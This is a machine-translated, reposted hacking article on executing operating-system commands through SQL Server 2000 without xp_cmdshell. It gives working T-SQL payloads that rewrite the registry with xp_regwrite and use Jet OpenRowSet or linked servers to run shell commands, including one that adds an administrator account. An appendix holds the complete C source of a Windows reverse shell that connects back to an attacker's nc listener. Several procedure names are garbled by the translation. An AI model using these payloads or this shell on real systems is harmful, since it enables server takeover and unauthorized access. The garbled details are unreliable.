Execute commands without xp_cmdshell

Source: Internet
Author: User

Using jet to execute shell commands is more cost-effective than trying to restore xp_mongoshell, but you need to guess the system path
NT/2 K: X: \ winnt \ system32 \
XP/2003: X: \ windows \ system32 \
Solution:
If you do not need RDS support, delete X: \ Program Files \ common files \ System \ MSADC \ msadcs. dll
Modifying the registry is not enough. For details, see the following

Of course, in addition to IAS. mdb, there are other MDB files as long as the file exists.
In system32 of 2003, there are two types: IAS. MDB and dnary. MDB.
For more information about other systems, see Dir/A/S *. MDB.

If there is a Echo, you can see the result returned by the execution. Otherwise, you need to judge the Host OS type and try again.
Of course, if it's a bit brutal, You can take four turns.

First, enable the jet sandbox mode, and implement the modification of the Registry by extending the Stored Procedure xp_regwrite. The administrator cannot prevent the modification of the Registry.
For security reasons, the default sandbox mode is not enabled, Which is why xp_regwrite is required. xp_regwrite requires at least the db_owner permission. For convenience, we recommend that you use SysAdmin for permission testing:
Exec master.. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engines', 'sandboxmode', 'reg _ dword', 1
Note:
0. disable everything (default)
1 enable access, but Disable other
2. Access is forbidden, but other
3. Enable everything

In fact, you can execute the statement with the db_owner permission, but the execution of the following statement has different requirements and cannot be executed directly. For details, see the following statement explanation.

Then run the system command using jet. oledb. This requires only % SystemRoot % read permission, which is still relatively loose, so the harm is quite high.
For users with only the db_owner permission, you need to establish a connection to the database for access. Direct access is not allowed. As to whether the access is successful, it has not been tested. If you are interested, you can test it on your own.
On msdn:
"Sp_addmediaserver: execute permissions default to members of the SysAdmin and setupadmin fixed server roles ."
It is found that sp_addmediaserver/sp_addjavassrvlogin can be executed with the setupadmin permission, while db_owner has all the permissions of the database, which should be successful theoretically.

Here, only the commands used with the SysAdmin permission are provided:
Select * From OpenRowSet ('Microsoft. jet. oledb.4.0 ','; database = c: \ winnt \ system32 \ IAS. MDB ', 'select shell ("cmd.exe/C net user admin admin1234/Add ")')

To create a linked database 'l0op8ack', refer to the command:
Exec sp_addmediaserver 'l0op8ack', 'ole DB provider for jet ', 'Microsoft. Jet. oledb.4.0', 'c: \ windows \ system32 \ IAS \ ias. mdb'

Verify the test results as follows (SysAdmin permission is used for installing mssql2k-sp3 in win2003 SP1 ):

Appendix:
When the database server cannot be connected (the database is generally not open to the outside, but can be accessed externally ),
You can use the bounce dos shell method and rewrite it to bind shell!
==================================== Cut here ===================== ========
// Name: Win32 connect back shell source code for NT/2 k/XP/2003
// Compile: CL win32cbsh. C (vc6)
// Usage:
// On your PC: NC-l-P {Listen port}
// On vitim PC: win32cbsh {Your IP} {Listen port}
// Warning: If there's no parameter specified, it will cause "Fatal error"
# Include <winsock2.h>
# Pragma comment (Lib, "ws2_32 ")
Int main (INT argc, char ** argv)
{
Wsadata;
Socket hsocket;
Startupinfo Si;
Process_information PI;
Struct sockaddr_in adik_sin;
Memset (& adik_sin, 0, sizeof (adik_sin ));
Memset (& Si, 0, sizeof (SI ));
Wsastartup (makeword (2, 0), & wsadata );
Hsocket = wsasocket (af_inet, sock_stream, null );
Adik_sin.sin_family = af_inet;
Adik_sin.sin_port = htons (atoi (argv [2]);
Adik_sin.sin_addr.s_addr = inet_addr (argv [1]);
If (0! = Connect (hsocket, (struct sockaddr *) & adik_sin, sizeof (adik_sin) Return-1;
Si. cb = sizeof (SI );
Si. dwflags = startf_usestdhandles;
Si. hstdinput = Si. hstdoutput = Si. hstderror = (void *) hsocket;
CreateProcess (null, "cmd.exe", null, null, 1, null, & Si, & PI );
Return 0;
}
This method can be executed, but unfortunately, the db_owner permission is insufficient. At least the SysAdmin permission or securityadmin + setupadmin permission combination is required.

Sp_addmediaserver requires SysAdmin or setupadmin Permissions
Sp_addjavassrvlogin requires SysAdmin or securityadmin permissions.
In the end, we found that the SA permission or setupadmin + securityadmin permission account can be used only,
Generally, no administrator has set the general account permission.

Not practical, just as a learning conclusion

The general process is as follows. If it is not SysAdmin, the IAS. mdb permission verification will fail,
I granted the setupadmin + securityadmin permission to the hacker user during the test, and failed to use IAS. MDB.
You need to find an MDB that can be accessed by a general user:

Exec sp_addmediaserver 'l0op8ack', 'jetoledb', 'Microsoft. Jet. oledb.4.0 ', 'c: \ winnt \ system32 \ IAS \ ias. mdb ';--
Exec sp_addjavassrvlogin 'l0op8ack', 'hacker ';--
Select * From openquery (l0op8ack, 'select shell ("cmd.exe/C net user ")');--
Exec sp_droplinkedsrvlogin 'l0op8ack', 'hacker ';--
Exec sp_dropserver 'l0op8ack ';--
In my sql2k SP3, sp_addserverlogin must be followed by a user name. If it is added to true or false, no user error is returned.

Haha, but it still fails.

The original process can also be injected. After the SP is played, no more

Abstract A T-SQL reference, in fact, this is the T-SQL reference heterogeneous ole db data source of Two Methods
OpenRowSet requires the SA permission. If you want to use sp_addlinkserver/openquery to break through, you will find that it cannot be successful.
========================================================== ====
Distributed Query Architecture
Microsoft SQL Server 2000 supports two methods to reference heterogeneous ole db data sources in transact-SQL statements ,:

1) Name of the linked server
The system stored procedures sp_add1_server and sp_add1_srvlogin are used to provide the server name for the ole db data source. You can use a name composed of four parts to reference objects on these linked servers in a Transact-SQL statement. For example, if the name of the linked server deptsqlsrvr is defined using another copy of SQL Server 2000, the following statement references a table on the server:

Select * From deptsqlsrvr. northwind. DBO. Employees

You can also specify the name of the linked server in the openquery statement to open a row set from the ole db data source. Then, you can reference this row set in a Transact-SQL statement as if you were referencing a table.

2) special connector name
When the data source is rarely referenced, the OpenRowSet or OpenDataSource function specifies the information required to connect to the server. Then, you can reference the row set using the same method as the referenced table in transact-SQL:

Select *
From OpenRowSet ('Microsoft. Jet. oledb.4.0 ',
'C: \ msoffice \ access \ samples \ northwind. mdb '; 'admin ';'';
Employees)

SQL Server 2000 uses OLE DB to communicate between the relational engine and the storage engine. The relational engine splits each Transact-SQL statement into a series of operations that are executed on a simple OLE DB row set opened by the storage engine from the base table. This means that the relational engine can also open a simple ole db row set on any ole db data source.
1. exec master .. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ jet \ 4.0 \ engine \ sandboxmode', REG_DWORD, 0 write a registry value, and enable access sandbox mode. That is, the functions that can be executed in non-application.
2. Open an access file with OpenRowSet. There are four such files in % WINDIR % \ system32 \ IAS. Use it as needed
3. The executed functions are as follows:
Function shell (byval command as string) as long

This article comes from [attention space], original article link: http://www.8-du.net/Article/2008/0514/article_40240.html

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.